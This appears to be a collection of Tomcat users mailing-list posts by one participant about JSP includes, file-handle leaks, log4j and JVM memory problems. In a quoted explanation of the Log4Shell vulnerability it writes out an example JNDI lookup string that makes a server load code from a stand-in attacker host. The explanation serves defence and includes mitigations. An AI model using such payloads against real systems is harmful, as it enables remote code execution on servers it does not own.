Re: [EXTERNAL EMAIL] Re: JSP include not working

[Niranjan Rao]

I'm one step further. Cloned the tomcat repo, switched to appropriate 
tag/branch and looked at the code.  Comments indicated need to have full 
path and my paths did not start with "/". Added the "/" on couple of 
pages and no more include error.



As of now, even though I don't get the include error, contents of the 
include file are not getting included. Trying to figure out why. At 
least now status code has changed from 500 to 200. Not working yet but 
progress never the less.



Regards,


Niranjan

On 12/5/23 11:09, Rob Sargent wrote:
On 12/5/23 12: 01, Niranjan Rao wrote: > Greetings, > > I'm missing 
something obvious and hoping that someone can point my > nose in right 
direction. > > > We have a application WAR file that works fine on 
tomcat 7. 0. 78. 

ZjQcmQRYFpfptBannerStart
This Message Is From an Untrusted Sender
You have not previously corresponded with this sender.
ZjQcmQRYFpfptBannerEnd
On 12/5/23 12:01, Niranjan Rao wrote:
> Greetings,
>
> I'm missing something obvious and hoping that someone can point my 
> nose in right direction.

>
>
> We have a application WAR file that works fine on tomcat 7.0.78. We're 
> trying to migrate this application to 9.0.82. When trying to hit the 
> pages, I'm getting error JSP file not found at WEB-INF/> location>. The app works fine in tomcat version 7. We have other 
> applications which use similar pattern and are working fine on tomcat 9.

>
>
> I've checked and checked and confirmed file exists at desired 
> location. Only significant difference between migrated apps and this 
> app I noticed was web.xml points version 4.0 where it works and 3.0 
> where it does not. Changing version to 4.0 in broken app did not help.

>
>
> The applications use Spring and serve JSP through spring controllers. 
> Problematic application seems to be initializing properly based on 
> application logs, just that it's not able to include JSP. Any log 
> files do not show any exception trace, but access log file logs the 
> error with 500 status code.

>

Case sensitive file names, perhaps.

>
> Am I missing something obvious?
>
> Regards,
>
> Niranjan
>


-----
To unsubscribe, e-mail:users-unsubscr...@tomcat.apache.org
For additional commands, e-mail:users-h...@tomcat.apache.org


--
*Niranjan Rao | Sr.Architect
*/he/his/
*Paymentus
**Paymentus Corporation***/The Real-Time Bill Payment Company^TM //^
/
860 Hillview Court Suite 220 Milpitas CA 95035
www.paymentus.com <http://www.paymentus.com/>

Re: [EXTERNAL EMAIL] Re: JSP include not working

[Niranjan Rao]

Thank you Rob, but doubtful. We're a Ubuntu shop and always mindful of 
case sensitivity.



On 12/5/23 11:09, Rob Sargent wrote:
On 12/5/23 12: 01, Niranjan Rao wrote: > Greetings, > > I'm missing 
something obvious and hoping that someone can point my > nose in right 
direction. > > > We have a application WAR file that works fine on 
tomcat 7. 0. 78. 

ZjQcmQRYFpfptBannerStart
This Message Is From an Untrusted Sender
You have not previously corresponded with this sender.
ZjQcmQRYFpfptBannerEnd
On 12/5/23 12:01, Niranjan Rao wrote:
> Greetings,
>
> I'm missing something obvious and hoping that someone can point my 
> nose in right direction.

>
>
> We have a application WAR file that works fine on tomcat 7.0.78. We're 
> trying to migrate this application to 9.0.82. When trying to hit the 
> pages, I'm getting error JSP file not found at WEB-INF/> location>. The app works fine in tomcat version 7. We have other 
> applications which use similar pattern and are working fine on tomcat 9.

>
>
> I've checked and checked and confirmed file exists at desired 
> location. Only significant difference between migrated apps and this 
> app I noticed was web.xml points version 4.0 where it works and 3.0 
> where it does not. Changing version to 4.0 in broken app did not help.

>
>
> The applications use Spring and serve JSP through spring controllers. 
> Problematic application seems to be initializing properly based on 
> application logs, just that it's not able to include JSP. Any log 
> files do not show any exception trace, but access log file logs the 
> error with 500 status code.

>

Case sensitive file names, perhaps.

>
> Am I missing something obvious?
>
> Regards,
>
> Niranjan
>


-
To unsubscribe, e-mail:users-unsubscr...@tomcat.apache.org
For additional commands, e-mail:users-h...@tomcat.apache.org


--
*Niranjan Rao | Sr.Architect
*/he/his/
*Paymentus
**Paymentus Corporation***/The Real-Time Bill Payment Company^TM //^
/
860 Hillview Court Suite 220 Milpitas CA 95035
www.paymentus.com <http://www.paymentus.com/>

JSP include not working

[Niranjan Rao]

Greetings,

I'm missing something obvious and hoping that someone can point my nose 
in right direction.



We have a application WAR file that works fine on tomcat 7.0.78. We're 
trying to migrate this application to 9.0.82. When trying to hit the 
pages, I'm getting error JSP file not found at WEB-INF/. 
The app works fine in tomcat version 7. We have other applications which 
use similar pattern and are working fine on tomcat 9.



I've checked and checked and confirmed file exists at desired location. 
Only significant difference between migrated apps and this app I noticed 
was web.xml points version 4.0 where it works and 3.0 where it does not. 
Changing version to 4.0 in broken app did not help.



The applications use Spring and serve JSP through spring controllers. 
Problematic application seems to be initializing properly based on 
application logs, just that it's not able to include JSP. Any log files 
do not show any exception trace, but access log file logs the error with 
500 status code.



Am I missing something obvious?

Regards,

Niranjan

--
*Niranjan Rao | Sr.Architect
*/he/his/
*Paymentus
**Paymentus Corporation***/The Real-Time Bill Payment Company^TM //^
/
860 Hillview Court Suite 220 Milpitas CA 95035
www.paymentus.com <http://www.paymentus.com/>

Re: [EXTERNAL EMAIL] Please help me install Tomcat

[Niranjan Rao]

71]: pam_unix(sudo:session): session
closed for user root//
//Jan 19 19:40:27 arbolone sudo[5672]:   jamiil : TTY=pts/0 ;
PWD=/home/jamiil/Downloads ; USER=root ; COMMAND=/usr/bi>//
//Jan 19 19:40:27 arbolone sudo[5672]: pam_unix(sudo:session): session
opened for user root(uid=0) by (uid=1000)//
//Jan 19 19:40:27 arbolone sudo[5672]: pam_unix(sudo:session): session
closed for user root//
//Jan 19 19:40:41 arbolone sudo[5691]:   jamiil : TTY=pts/0 ;
PWD=/home/jamiil/Downloads ; USER=root ; COMMAND=/usr/bi>//
//Jan 19 19:40:41 arbolone sudo[5691]: pam_unix(sudo:session): session
opened for user root(uid=0) by (uid=1000)//
//Jan 19 19:40:41 arbolone sudo[5691]: pam_unix(sudo:session): session
closed for user root//
//Jan 19 19:40:57 arbolone sudo[5713]:   jamiil : TTY=pts/0 ;
PWD=/home/jamiil/Downloads ; USER=root ; COMMAND=/usr/bi>//
//Jan 19 19:40:57 arbolone sudo[5713]: pam_unix(sudo:session): session
opened for user root(uid=0) by (uid=1000)//
//Jan 19 19:40:57 arbolone sudo[5713]: pam_unix(sudo:session): session
closed for user root//
//Jan 19 19:42:28 arbolone gnome-shell[1443]: libinput error: event10 -
Logitech Wireless Mouse: client bug: event pro>//
//Jan 19 19:42:28 arbolone gnome-shell[1443]: libinput error: event10 -
Logitech Wireless Mouse: WARNING: log rate lim>//
//lines 2916-2938/2938 (END)/


I really don't even know what to do with that info. I am an enthusiast
programmer and not a trained computer programmer, thus I find this kind
of things really challenging.

an anyone help?


/Thanks/


--
*Niranjan Rao | Sr.Architect
**Paymentus
**Paymentus Corporation***/The Real-Time Bill Payment Company^TM //^
/
860 Hillview Court Suite 220 Milpitas CA 95035
www.paymentus.com <http://www.paymentus.com/>

Re: [EXTERNAL EMAIL] FW: Errors in Tomcat logs / application processing

[Niranjan Rao]

Please remember to remove any passwords or sensitive data when you post 
on public email lists


On 11/8/22 00:58, Ganesan, Prabu wrote:
‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ 
‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ 
‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ 
‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ 
‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ 
‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ 
‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍ ‍

ZjQcmQRYFpfptBannerStart
This Message Is From an External Sender
ZjQcmQRYFpfptBannerEnd

Hi Team .

Could you please help with below errors

We have enabled TLS successfully – but after TLS enabled we are facing 
below issues .


Please help us on Priorities

Thanks & Regards,

_Email_CBE.gif

*PrabuGanesan***

*Consultant|MS-Nordics*

capgemini India Pvt. Ltd. | Bangalore **

Contact: +91 8526554535

Email: prabhu.c.gane...@capgemini.com

www.capgemini.com 



*People matter, results count.*

__

*Connect with Capgemini:*


Please consider the environment and do not print this email unless 
absolutely necessary.


Capgemini encourages environmental awareness.

*From:*Morell, Alice 
*Sent:* 07 November 2022 21:33
*To:* DL IN IKANO Middleware 
*Cc:* Thombre, Dipali Rajesh ; 
Nayak, Shruthi ; Khandekar, Preeti 
; Deshmukh, Hemant 
; Phase, Samir 


*Subject:* Errors in Tomcat logs / application processing

Hello!

The error we are facing is:

“SOAP Problems executing transaction LoginApplication via Web Service, 
underlying problem is Error unmarshalling message”


*I want to know if we can solve this by changing the values in the 
context.xml tags. *The hardcoded URL’s.**


As agreed, here are

  * Info on error logs,
  * Screen shots of the errors that the end user is seeing,
  * Sequential steps for TLS on the instances

And

  * Example on the changes made in the files

You can find the error logs generated for these 2 URLs at this location:

/export/home/aloradm/tls/tls2/Test1FrontEnd/

Where the directory called “1” is for what is described under issue 1 
and “2” under issue 2.. 


 1. To replicate current error:

Use a browser with a cleared cache!

Browse to:

tvmdc2linweb001.baf.ikano:7400/PCUKTST1ENV/ikanoRetail/

Press ”Contact Centre” too get this first error:

Press “Click here to log in again” and then the red button that says 
“Contact centre”.


The page is just getting reloaded to same screen again. For each time 
you press the red button, a url pattern of “/contactcentre” is added 
to the path:


In the backend, the logs for my tries is attached in the folder 
ikanoRetailLogin


-- 



-- 



-- 



To replicate current error you need login credentials, so you can only 
view my screen shot for this one:


Use a browser with a cleared cache!

Browse to:

Re: [EXTERNAL EMAIL] About granting permissions to Tomcat JVM

[Niranjan Rao]

Are you using FileInputStream or FileOutputSteam on the file and closing 
the stream before deletion? If so, change to Files.newInputSteam or 
Files.newOutputStream.


One of our application (not a web application) was running out of file 
handles even though we were closing the file handles. Everything was in 
try block and we did verify the handles were closed as far our code was 
concerned. It turned out that JVM does not close the actual handles 
until late in the game. There is a bug on openjdk bugs tracker that 
discusses this. After using Files, our issue was resolved.


If you are closing the file and JVM is not releasing the handles, this 
sounds very similar to the issue we faced.



Regards,


Niranjan


On 10/8/22 09:36, Martin Moore wrote:
Hello, I am facing a problem using Tomcat V8 with my J2ee app that 
deletes (using file. delete() Java 8) a file from disk (Windows). The 
file is actually deleting only on application level meaning that the 
application does not see the file anymore

ZjQcmQRYFpfptBannerStart
This Message Is From an Untrusted Sender
You have not previously corresponded with this sender.
ZjQcmQRYFpfptBannerEnd
Hello,

I am facing a problem using Tomcat V8 with my J2ee app that deletes (using
file.delete() Java 8) a file from disk (Windows). The file is actually
deleting only on application level meaning that the application does not
see the file anymore but if i open the folder i still see the file which is
then locked by Java process. I only get the file to be removed physically
when i close the Tomcat instance.

Does this problem relate to permissions in catalina.policy ?
How to solve this?

Re: Latest version url

[Niranjan Rao]

Came up with a one liner in case if someone else needs it. If you think 
it can be improvised, please feel free to improvise. Rest of it can fit 
in the shell script nicely.


curl https://tomcat.apache.org/doap_Tomcat.rdf | grep -A2 "Latest Stable 
9.0.x Release" | grep "" | sed "s###g"


Regards,

Niranjan

On 9/3/22 11:15, Mark Thomas wrote:

Hi,

The short answer is no. You are going to have to parse something and 
then construct the URL from the result.


I can think of a couple of options.

1. https://tomcat.apache.org/doap_Tomcat.rdf
2. The download page
3. https://dlcdn.apache.org/tomcat/tomcat-10/

You might also be able to do something with a dummy Maven project and 
a dependency on org.apache.tomcat:tomcat and an appropriate version 
range.


Mark


On 03/09/2022 00:27, NH Rao wrote:

Greetings,

I am looking for a perma link or similar which won't go away and 
point to

latest version of tomcat for the currently supported major versions.
Official downloads page points to latest minor release of the major 
version

e.g. https://tomcat.apache.org/download-90.cgi and download links keep
changing.

Is there any way to get latest version link or latest version and 
then us
forming the url from tomcat website. We have scripts that download 
whatever

latest version available and run some tests and link keeps breaking.

Regards,

Niranjan



-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: AW: AW: AW: AW: Filehandle left open when using sendfile

[Niranjan Rao]

On 6/20/22 23:59, Thomas Hoffmann (Speed4Trade GmbH) wrote:

Hello Mark,


-Ursprüngliche Nachricht-
Von: Mark Thomas 
Gesendet: Montag, 20. Juni 2022 22:13
An: users@tomcat.apache.org
Betreff: Re: AW: AW: AW: Filehandle left open when using sendfile

On 20/06/2022 11:39, Thomas Hoffmann (Speed4Trade GmbH) wrote:

Hello Mark,

thanks for your reply!


-Ursprüngliche Nachricht-
Von: Mark Thomas 
Gesendet: Montag, 20. Juni 2022 12:06
An: users@tomcat.apache.org
Betreff: Re: AW: AW: Filehandle left open when using sendfile

On 16/06/2022 19:58, Thomas Hoffmann (Speed4Trade GmbH) wrote:




In the meantime I stumbled upon this bug-Report:
https://bugs.java.com/bugdatabase/view_bug.do?bug_id=4715154
So maybe the problem lies even deeper.
Similar description here:
https://cemerick.com/blog/2006/08/30/memory-mapping-files-in-java-

caus

es-problems.html

Some ppl suggest to use java.lang.ref.Cleaner or don’t use Memory-

Mapped files under Windows.

I don’t know if there are other solutions.

Your research looks to be exhaustive. I can't find any better ideas.

Using the java.lang.ref.Cleaner looks to be a viable option. We know
when the mapped file is no longer being used. However, that requires
Java 12 onwards.

This is only going to be required if the file locking is an issue. In
read-only scenarios or when using an OS other than Windows it won't be

an issue.

So, what do we want to do?

1. Disable sendfile for HTTP/2 if running on Windows?

2. Document the potential issues with sendfile + HTTP/2 + Windows if
resources are not read-only?

3. Use the JreCompat mechanism to clear the references if possible:
  - if running on Windows
  - on all OSes
  - if enabled via configuration

Something else?

Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

I did some further searching on this topic.
Several posts disregard using java.lang.ref.Cleaner because if the buffer is

used afterwards, it will crash the VM. But if used carefully it works.

If we use this option, it should be possible to use it appropriately carefully.


About your suggestions:
2) Documenting would be helpful, if lock can't be prevented.
   I also found documentation at e.g.

https://docs.oracle.com/javase/9/docs/api/java/nio/channels/FileChannel.h
tml#map-java.nio.channels.FileChannel.MapMode-long-long-

   " The buffer and the mapping that it represents will remain valid until

the buffer itself is garbage-collected."

Which is essentially the problem. Using the Cleaner would clean up the
reference sooner.


3) As JreCompat is a bit risky, enabling via config sounds safe to me.

JreCompat is perfectly safe. The jdk.internal.misc.Unsafe API is where the
risk is and this is primarily the risk of the crash mentioned above that we
should be able to avoid.


Some other (theoretical?) options:
4) In an older version of Tomcat native lib there seemed to be a native

Implementation of MMap: https://tomcat.apache.org/tomcat-10.0-
doc/api/org/apache/tomcat/jni/Mmap.html

I read that this was an alternative to the Java memory mapped
file.  But it was removed in newer versions. Maybe it can be
resurrected for this case and used if native lib is available(?)

Sorry, no. We are moving away from the native library. Eventually we will just
use project Panama to wrap OpenSSL. Until then, we are removing
everything that isn't required to support the use of OPenSSl with NIO and
NIO2.

The primary reason for this is stability.


5) Instead of FileChannel.map maybe a normal ByteBuffer with
FileChannel.read(buffer) can be used (?)

That is worth considering. The other sendfile implementations don't use a
memory mapped file.

I'll start a discussion on the dev list.


One remaining question:
I didn’t find FileChannel.map in the other connectors. Is

Http2AsyncUpgradeHandler the only occurrence?

In the main code base, yes. There is another usage in the test code but that is
less of a concern.

Mark


Just two thoughts / remarks:
3) New java versions provide java.lang.ref.Cleaner. In older java versions a 
similar class was sun.misc.Cleaner (though the usage looks a bit strange)

5) The memory mapped file approach is quite memory efficient as the file gets 
virtually mapped into the address space of the java process
  without loading all the data into (real) memory. As far as I understood, 
only the used parts of the file gets loaded by Windows OS.
 When reading the file into a Buffer, the file is read completely. This 
shouldn’t make a big difference with files around some KB or MB.
  However, for large files with several GB they might be handled well via 
memory mapped files but not with a ByteBuffer.
  I am not sure, if sendfile is popular and used for this use-cases. So maybe a configuration 
toggle between "memory-optimized" and "lock-optimized" might be 

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Niranjan Rao]

This is one of the best explanation I've seen. And it does not use the 
word Minecraft to emphasis the importance.


Thank you.

Niranjan
On 12/13/21 3:36 PM, Christopher Schultz wrote:

James,

On 12/13/21 14:48, James H. H. Lampert wrote:

On 12/13/21 10:53 AM, Mark Thomas wrote:

Log4j2 supports a log message format syntax that includes JNDI lookups.

Log4j2 processes log messages repeatedly until it doesn't find any 
more format strings. This means the output of one format string can 
insert a new format string.

. . .

Thanks. It's starting to make sense to me now, even given that much 
of it involves Java functionality I'd never heard of.


After re-reading the Veracode article in light of what you said, I 
then found a couple of Wikipedia articles that further clarify 
things, for me at least:


https://en.wikipedia.org/wiki/Log4j
https://en.wikipedia.org/wiki/Log4Shell

So it's the ability to resolve stuff of the general format 
"${prefix:name}" within a log string, that's the problem.


It's starting to reach a point where I can wrap my 59-year-old little 
grey cells around it.


As much fun as it is to talk about this stuff, "we" (ASF volunteers, 
as well as many others) tend to try not to provide examples of how to 
exploit vulnerabilities. In this case, all you have to do it search 
GitHub for this CVE or "log4shell" on GitHub and you can see lots of 
examples.


In this case, the cat is out of the bag. I'm still not going to 
provide specific examples, but I can help you understand, conceptually.


The link Mark provided in a separate response has some of the dirty 
details. Without talking at that level of detail, the worst attack 
works essentially like this:


1. Attacker hosts an RMI server, which is a thing that allows Java 
(client) applications to remotely-load .class files from other places. 
This is great in an "enterprise" environment because a service can 
tell a client "here is the thing you need to work with me" instead of 
saying "well, if you don't have foo-bar-1.4.5.jar loaded then you can 
piss off." It's handy... and seriously dangerous if you aren't careful.


Any evildoer can do this whenever they want, there is nothing stopping 
them, nor is it really that damaging to the world in general. Just 
like I can brew poison in my own bathtub, if nobody is drinking from 
my bathtub (ew?), it's not likely to cause too much sickness or death.


2. A vulnerability is discovered and reported in log4j. This allows 
log *messages* to contain JNDI lookups. This includes 
attacker-controlled things like e.g.:


  log.info("FYI User " + username + " just searched for search string 
" + queryString);


Pretty innocuous, right? Well, if the search string looks like 
${jndi:[stuff]} then ... boom.


3. JNDI lookups allow you to request that information be pulled-in 
from an LDAP server. JNDI across the network is essentially the same 
thing as LDAP (or "Active Directory" if that's what you use... AD is 
LDAP). One of the things you can tell your JNDI lookup to do is load a 
.class file over the network and use it for $stuff.


4. Remember that evil RMI server we set up in #1 above? Well, unless 
you are filtering-out LDAP connections to random IPs (and, really, you 
*should be*), then I as an attacking user can just go to your 
application and search for


  "Hey buddy lol ${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject};

At this point, log4j will consider this string to log:

FYI User chris just searched for the search string Hey buddy lol 
${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject}


Oh, look, there's a magic "${jndi:" thing in there. Let's helpfully 
resolve that...


The JNDI lookup causes your server to reach-out to my.evil.ip, pull a 
reference for that class across the wire, then pull the class 
definition across the wire, and run the evil class code on your server.


At this point, the resulting string written to the log does make a bit 
of difference. The evil code has been loaded onto your server and you 
have a Bad Day.


Now, this can be mitigated in a number of ways, which is nice. My two 
favorite (and incomplete) ways to mitigate this are:


1. Don't allow outgoing LDAP connections from your server. In fact, it 
doesn't matter if they are LDAP or not. Don't allow outgoing 
connections from your servers except the required[1] ones.


2. Recent Java versions automatically disable remote-classloading via 
LDAP to prevent this kind of monkey business. But there are ways to 
make it work anyway.


This is why we can't have nice things.

RCE is bad m'kay, but let's say that you don't allow outgoing network 
connections AT ALL from your server, so you are TOTALLY IMMUNE from 
this kind of attack. Well, RCE ain't the only thing possible.


Data exfiltration is an often-overlooked attack that can still be 
pretty bad. It's "limited" to what can be found in/through JNDI but 
... it's possible to find quite a bit of interesting information that 
way. How? Those log 

Access log format in the access og files

[Niranjan Rao]

Greetings,

We are on tomcat 9.* version.

Is there any way to log the format string used by access log valve in 
the access logs? I'd be happy to see the format string like '%h %I %u %t 
"%r" %s %b "%{Referer}i" "%{User-Agent}i"' in the log files either at 
top of the file when file rolls to next day or in the middle of the file 
if tomcat is restarted for whatever reason.



We discovered that some servers were configured in a different way and 
our log analysis tool were barking at wrong field from the log. If tool 
can see the format in the file, it will be easier to read next lines 
based on the format and find exact fields that we are interested in.



Regards,


Niranjan


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Using log4j for logging

[Niranjan Rao]

We are actually using log4j2, I should have been more clearer.

Does this mean we don't have to use specialized juli jar and adapters 
and many of the stackoverflow answers are out of date? I have seen 
answers saying download juli adapter version from tomcat version 7 and 
use it for 9 or similar.


Regards,

Niranjan

On 6/29/21 12:24 AM, Mark Thomas wrote:

On 29/06/2021 01:11, Niranjan Rao wrote:

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last 
present on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). 
Latter versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the 
best way to configure tomcat logs using log4j.


log4j was declared end of life in 2015. If you really need to use 
log4j then there are some pointers here:


https://stackoverflow.com/questions/869945/how-to-send-java-util-logging-to-log4j 



I'd recommend the answer from Emmanuel Bourg.

If you are using log4j2 then you can use:
https://logging.apache.org/log4j/2.x/log4j-jpl/index.html

Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Using log4j for logging

[Niranjan Rao]

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last present 
on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). Latter 
versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the best 
way to configure tomcat logs using log4j.



My main interest is uploading access logs and catalina.out to AWS/S3 
bucket. For our application logs, we are already doing this. If there is 
a better way to achieve this, open to that solution too.



Regards,

Niranjan


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: What sets Java version at installation?

[Niranjan Rao]

Try out following command. Entry with * is the java version your system 
is set to use. You can use same command to config alternate version.


update-alternatives --config java

We routinely use multiple versions of JDK on many systems. We just set 
JAVA_HOME and derive all paths from that. Works perfectly.


Regards,

Niranjan

On 6/11/21 2:00 PM, Mark Thomas wrote:

On 11/06/2021 21:53, Joel Griffith wrote:

Hi everyone,

I have two Ubuntu 20.04 servers, both with Tomcat 9 and Java 8 installed
from the standard repositories.

On the first, I installed Java 8 before installing Tomcat 9. When I
installed Tomcat 9, it evidently found the existing Java 8 installation,
and when I run the server it reports that it's using Java 8
(`/usr/lib/jvm/java-8-openjdk-amd64/bin/java`).

On the second, I installed Tomcat 9 before installing Java. Thus, Tomcat
found no existing Java on the system, and it installed the additional
packages 'openjdk-11-jre-headless', 'default-jre-headless', and
'java-common' as dependencies that it did not install on the first 
system.

When I run Tomcat on this one, it reports that it's using Java 11
(`/usr/lib/jvm/default-java/bin/java`, which symlinks to
`/usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java`), even though I've 
since

installed Java 8 on that server, too.

Both systems use Java 8 as their default at the OS level (outside of
Tomcat):

$ java -version
openjdk version "1.8.0_292"

so I think it's a Tomcat-specific discrepancy.

I assume that there's a file Tomcat uses to record which version of 
Java it
established at installation and which continues to affect how it runs 
now.

Is that right, and if so, where is this file?


Nope. Nothing to do with Tomcat. You'll need to ask Ubuntu support 
what is going on.


Mark


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Defining environment variables for a webapp ?

[Niranjan Rao]

On 4/14/21 5:29 AM, Rony G. Flatscher (Apache) wrote:

A JVM
AFAIK would not honor changes to the environment after it got started


A serious question. Apologies for selective selection from the response.

Are there any operating systems where change in environment is 
automatically reflected in child process? My understanding was, 
processes always inherit parent environment and have no way of knowing 
what changed.



If you managed to spawn a process with different parent based on your 
operating system, then you might see new values, but most of the 
spawn/exec calls (regardless of language of implmentation) inherit the 
exact same environment variables. Some calls do allow you to setup the 
environment variables for child process but struggling to figure out 
where grandparent process informed parent about environment change which 
can be sent to grandchild.



Regards,


Niranjan


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Out of memory exception

[Niranjan Rao]

On 2/18/21 12:53 PM, Shawn Heisey wrote:

On 2/18/2021 12:11 PM, Niranjan Rao wrote:
Thank you the response. This is not a web application, but a 
standalone java program. Hence I said it's not a tomcat question, but 
a generic JVM question. I have been researching about this a lot and 
based on many mails on this list, lot of people here know about 
internal behavior of JVM and specs lot better than I do.


Apologies for getting that wrong.

Is it a custom app or something that you downloaded and installed?  
Talk to whoever wrote it.  They will hopefully know what information 
is needed to troubleshoot further.


Is Java 15 required for the application to function?  If you can 
successfully use Java 11 or even Java 8, you'll be dealing with a far 
more stable platform.  Major show-stopper bugs in Java are rare, but 
they do happen.  I will warn you that although I do recommend 
downgrading Java for stability purposes, I do not hold out a lot of 
hope that it will solve this problem.


Which garbage collector are you using?  I would recommend one of the 
really stable collectors, like G1.  I wrote this wiki page a long time 
ago that includes garbage collection information for Solr ... I think 
it would apply well to any application where latency is important than 
throughput:


https://cwiki.apache.org/confluence/display/SOLR/ShawnHeisey

Thanks,
Shawn

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

I tried talking to the author, myself - but not much luck. Anyways 
talking with self does not help with new ideas much ;)


We added lot of logging and wrote a simple throw away tool to analyze 
the logs. Even though task counts are similar, there were some time out 
errors that could be causing the leaks. Currently a patch is deployed 
and we are waiting to see if it has made any impact.


Interesting point was why is one machine getting brunt of bad things. 
May be we will drop the box and spawn another VM with the assumption 
that host could be heavily loaded or something similar not easily 
visible things going on.


Your blog entry is very informative. Thank you.


Regards,


Niranjan


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Out of memory exception

[Niranjan Rao]

Hi Shawn

Thank you the response. This is not a web application, but a standalone 
java program. Hence I said it's not a tomcat question, but a generic JVM 
question. I have been researching about this a lot and based on many 
mails on this list, lot of people here know about internal behavior of 
JVM and specs lot better than I do.


Both the boxes are spawned from same AWS image, we build the image. 
There is no other difference. Both receive tasks over MQ.  Tasks could 
be slightly different - like for different users, number of entities 
user holds etc, but they should not be too different or kind of should 
average out in the long run. We have examined the data for the tasks and 
nothing unusual has come out so far.


Regards,

Niranjan
On 2/18/21 10:59 AM, Shawn Heisey wrote:

Regards,

Niranjan


On 2/18/2021 11:36 AM, Niranjan Rao wrote:
First apologies for non tomcat question. I have seen that there is 
enough expertise here to provide hints and hints are what I am 
looking for to solve the problem and question is generic enough. I 
have tried researching problem to best of my abilities.


I believe you're right to think this isn't a tomcat question. There 
are a lot of things it could be.  Tomcat is a *possible* source, 
though I think the chance of that is low.  Without a LOT of info that 
I would probably be useless at interpreting or asking for, it's 
impossible to say for sure.


With problems like this, it is normally the application running inside 
Tomcat that has a problem, not Tomcat itself.  You're likely to get a 
lot more useful information if you go to the people responsible for 
those applications.


We have a java program that regularly throws 
"java.lang.OutOfMemoryError: Java heap space" exception. Puzzling 
point is it happens only on one VM. We have a set of two VMs/boxes 
spawned from same AWS image. Machine class/region is exactly same and 
since they are from same image, they should be mostly identical 
except stuff like host name, ip address etc.


Number of tasks performed by VMs are comparable and not a significant 
difference. Yet, one VM never runs of out of memory and other one 
does. Sometimes it's as soon as half an hour after restarting the 
process while on the other box process is running for days and no 
issues.


"Comparable" isn't "identical".

Are they running the same apps?  Which apps are involved?  Is the one 
that's throwing OOME handling substantially similar requests when 
compared to one that doesn't?  Is the request rate nearly the same, or 
is the problematic one handling a lot more?  Another applicable 
question, also off topic for this mailing list:  Are the apps in both 
cases configured identically?


I took memory dumps from both VMs and they look similar. Program is 
started with -Xmx1g flag and we have taken regular memory dumps. In 
many cases eclipse MAT reports total memory usage was less than 100MB 
when program crashed with out of memory exception.


That's extremely odd, unless the application requested a REALLY big 
chunk of memory such that the 100MB existing plus the new allocation 
would be larger than the max heap size of 1GB.


Do you have enough free memory that you could increase the max heap to 
2GB or beyond and see what happens?


Has anyone seen anything similar to this? Identical bits of code 
